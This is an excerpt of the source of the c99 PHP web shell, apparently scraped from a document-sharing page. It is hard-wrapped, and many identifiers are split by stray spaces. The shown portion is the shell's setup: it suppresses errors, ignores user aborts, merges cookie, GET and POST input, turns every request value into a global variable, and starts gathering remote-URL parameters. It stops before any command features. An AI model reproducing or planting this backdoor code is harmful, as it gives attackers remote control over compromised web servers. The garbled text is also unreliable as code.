You are on page 1of 1

<?php //Starting calls if (!

function_exists("getmicrotime")) {function getmicrot


ime() {list($usec, $sec ) = explode(" ", microtime()); return ((float)$usec + (f
loat)$sec);}} if (!function_exists("file_get_contents")) { function file_get_con
tents($filenam e){ $handle = fopen($filename, "r"); $retval = fread($handle, fil
esize($filename )); fclose($handle);return $retval;}} error_reporting(5); @ignor
e_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_O
S,0,3)) == "win"; define("starttime",getmicrotime()); if (get_magic_quotes_gpc()
) {if (!function_exists("strips")) {function strips(&$ arr,$k="") {if (is_array(
$arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["
$k"]);}}} else {$arr = stripslashes($arr);}}} strips($G LOBALS);} $_REQUEST = ar
ray_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k))
{$$k = $v;}} $shver = "1.0 pre-release build #17"; //Current version //CONFIGUR
ATION AND SETTINGS if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = ""
;} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);
} else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL } $su
rl_autofill_include = TRUE; //If TRUE then search variables with descriptors (UR
Ls) and save it in SURL. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]
) {$include = "&"; foreac h (explode("&",getenv("QUERY_STRING")) as $v) {$v = ex
plode("=",$v); $name = url decode($v[0]); $value = urldecode($v[1]); foreach (ar
ray("http://","https://","s sl://","ftp://","\\\\") as $needle) {if (strpos($val
ue,$needle) === 0) {$include str .= urlencode($name)."=".urlencode($value)."&";}
}} if ($_REQUEST["surl_autofi ll_include"]) {$includestr .= "surl_autofill_inclu

You might also like